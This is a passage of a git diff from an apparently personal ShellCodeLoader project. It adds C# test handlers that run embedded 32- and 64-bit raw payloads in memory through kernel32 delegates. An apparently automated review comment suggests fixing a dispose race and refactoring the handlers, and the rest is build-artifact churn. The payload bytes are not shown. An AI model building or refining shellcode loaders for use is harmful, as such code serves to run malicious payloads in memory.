+ {
+ if (IntPtr.Size == 8)
+ {
+ ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadCpp64.rawData);
+ cpp.LoadWithKernel32Delegates();
+ cpp.Dispose();
+ ShellCodeLoader.ShellCodeLoader csharp = new ShellCodeLoader.ShellCodeLoader(PayloadCSharp64.rawData);
+ csharp.LoadWithKernel32Delegates();
+ csharp.Dispose();
+ }
+ else
+ {
+ ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadCpp32.rawData);
+ cpp.Asynchronous = true;
+ cpp.LoadWithKernel32Delegates();
+ cpp.Dispose();
+ ShellCodeLoader.ShellCodeLoader csharp = new ShellCodeLoader.ShellCodeLoader(PayloadCSharp32.rawData);
+ csharp.LoadWithKernel32Delegates();
+ csharp.Dispose();
+ }
+
+ }
}
}
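Review bot: In the 32-bit branches of `button3_Click` and `button4_Click`, `cpp.Asynchronous = true` is followed immediately by `cpp.Dispose()`, so the loader can be disposed while the `Task.Run` work started by the load call is still running. `Dispose` is not part of this diff, so the effect depends on what it releases; if it frees or clears the buffer, this is a use-after-dispose. Either drop the flag here or have the load methods return the `Task` so the handler can wait before disposing. The 64-bit branches never set the flag, and the two handlers differ only in the method called, so one shared helper taking the payload and an `Action<ShellCodeLoader.ShellCodeLoader>` would replace the four near-identical blocks.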
diff --git a/Test/obj/Debug/DesignTimeResolveAssemblyReferences.cache b/Test/obj/Debug/DesignTimeResolveAssemblyReferences.cache
index c1ef4da..d9c9611 100644
Binary files a/Test/obj/Debug/DesignTimeResolveAssemblyReferences.cache and b/Test/obj/Debug/DesignTimeResolveAssemblyReferences.cache differ
diff --git a/Test/obj/Debug/Test.csproj.AssemblyReference.cache b/Test/obj/Debug/Test.csproj.AssemblyReference.cache
index f5e894a..9e11a68 100644
Binary files a/Test/obj/Debug/Test.csproj.AssemblyReference.cache and b/Test/obj/Debug/Test.csproj.AssemblyReference.cache differ
diff --git a/Test/obj/Debug/Test.csproj.GenerateResource.cache b/Test/obj/Debug/Test.csproj.GenerateResource.cache
index ee0944a..f2904a4 100644
Binary files a/Test/obj/Debug/Test.csproj.GenerateResource.cache and b/Test/obj/Debug/Test.csproj.GenerateResource.cache differ
diff --git a/Test/obj/Debug/Test.exe b/Test/obj/Debug/Test.exe
index 70a2d0f..724be4d 100644
Binary files a/Test/obj/Debug/Test.exe and b/Test/obj/Debug/Test.exe differ
diff --git a/Test/obj/Debug/Test.pdb b/Test/obj/Debug/Test.pdb
index 806e98b..6080acc 100644
Binary files a/Test/obj/Debug/Test.pdb and b/Test/obj/Debug/Test.pdb differ
diff --git a/Test/obj/Release/Test.Form1.resources b/Test/obj/Release/Test.Form1.resources
new file mode 100644
index 0000000..6c05a97
Binary files /dev/null and b/Test/obj/Release/Test.Form1.resources differ
diff --git a/Test/obj/Release/Test.Properties.Resources.resources b/Test/obj/Release/Test.Properties.Resources.resources
new file mode 100644
index 0000000..6c05a97
Binary files /dev/null and b/Test/obj/Release/Test.Properties.Resources.resources differ
diff --git a/Test/obj/Release/Test.csproj.AssemblyReference.cache b/Test/obj/Release/Test.csproj.AssemblyReference.cache
new file mode 100644
index 0000000..f5e894a
Binary files /dev/null and b/Test/obj/Release/Test.csproj.AssemblyReference.cache differ
diff --git a/Test/obj/Release/Test.csproj.CopyComplete b/Test/obj/Release/Test.csproj.CopyComplete
new file mode 100644
index 0000000..e69de29
diff --git a/Test/obj/Release/Test.csproj.CoreCompileInputs.cache b/Test/obj/Release/Test.csproj.CoreCompileInputs.cache
new file mode 100644
index 0000000..058c7f4
--- /dev/null
+++ b/Test/obj/Release/Test.csproj.CoreCompileInputs.cache
@@ -0,0 +1 @@
+cc3bca52f731fc5b76c24ac730a2561f6c360edc
diff --git a/Test/obj/Release/Test.csproj.FileListAbsolute.txt b/Test/obj/Release/Test.csproj.FileListAbsolute.txt
new file mode 100644
index 0000000..fc99eaf
--- /dev/null
+++ b/Test/obj/Release/Test.csproj.FileListAbsolute.txt
@@ -0,0 +1,13 @@
+F:\Personal\ShellCodeLoader\Test\bin\Release\Test.exe.config
+F:\Personal\ShellCodeLoader\Test\bin\Release\Test.exe
+F:\Personal\ShellCodeLoader\Test\bin\Release\Test.pdb
+F:\Personal\ShellCodeLoader\Test\bin\Release\ShellCodeLoader.dll
+F:\Personal\ShellCodeLoader\Test\bin\Release\ShellCodeLoader.pdb
+F:\Personal\ShellCodeLoader\Test\obj\Release\Test.csproj.AssemblyReference.cache
+F:\Personal\ShellCodeLoader\Test\obj\Release\Test.Form1.resources
+F:\Personal\ShellCodeLoader\Test\obj\Release\Test.Properties.Resources.resources
+F:\Personal\ShellCodeLoader\Test\obj\Release\Test.csproj.GenerateResource.cache
+F:\Personal\ShellCodeLoader\Test\obj\Release\Test.csproj.CoreCompileInputs.cache
+F:\Personal\ShellCodeLoader\Test\obj\Release\Test.csproj.CopyComplete
+F:\Personal\ShellCodeLoader\Test\obj\Release\Test.exe
+F:\Personal\ShellCodeLoader\Test\obj\Release\Test.pdb
diff --git a/Test/obj/Release/Test.csproj.GenerateResource.cache b/Test/obj/Release/Test.csproj.GenerateResource.cache
new file mode 100644
index 0000000..976c1bd
Binary files /dev/null and b/Test/obj/Release/Test.csproj.GenerateResource.cache differ
diff --git a/Test/obj/Release/Test.exe b/Test/obj/Release/Test.exe
new file mode 100644
index 0000000..ef7cd64
Binary files /dev/null and b/Test/obj/Release/Test.exe differ
diff --git a/Test/obj/Release/Test.pdb b/Test/obj/Release/Test.pdb
new file mode 100644
index 0000000..1ebdc16
Binary files /dev/null and b/Test/obj/Release/Test.pdb differ
diff --git a/Test/obj/x64/Debug/Test.csproj.AssemblyReference.cache b/Test/obj/x64/Debug/Test.csproj.AssemblyReference.cache
index 79e1112..775dd3a 100644
Binary files a/Test/obj/x64/Debug/Test.csproj.AssemblyReference.cache and b/Test/obj/x64/Debug/Test.csproj.AssemblyReference.cache differ
diff --git a/Test/obj/x64/Debug/Test.csproj.CoreCompileInputs.cache b/Test/obj/x64/Debug/Test.csproj.CoreCompileInputs.cache
index 9b23b08..855dbe7 100644
--- a/Test/obj/x64/Debug/Test.csproj.CoreCompileInputs.cache
+++ b/Test/obj/x64/Debug/Test.csproj.CoreCompileInputs.cache
@@ -1 +1 @@
-e611841c91334bbfdd54b06c6f65ffef0d5bc2a6
+69ed1963c678b7433cfcad1463c463db4cb3db12
diff --git a/Test/obj/x64/Debug/Test.csproj.GenerateResource.cache b/Test/obj/x64/Debug/Test.csproj.GenerateResource.cache
index ee0944a..f2904a4 100644
Binary files a/Test/obj/x64/Debug/Test.csproj.GenerateResource.cache and b/Test/obj/x64/Debug/Test.csproj.GenerateResource.cache differ
diff --git a/Test/obj/x64/Debug/Test.exe b/Test/obj/x64/Debug/Test.exe
index 80486ac..4347f89 100644
Binary files a/Test/obj/x64/Debug/Test.exe and b/Test/obj/x64/Debug/Test.exe differ
diff --git a/Test/obj/x64/Debug/Test.pdb b/Test/obj/x64/Debug/Test.pdb
index 3ccfd75..4fd0d42 100644
Binary files a/Test/obj/x64/Debug/Test.pdb and b/Test/obj/x64/Debug/Test.pdb differ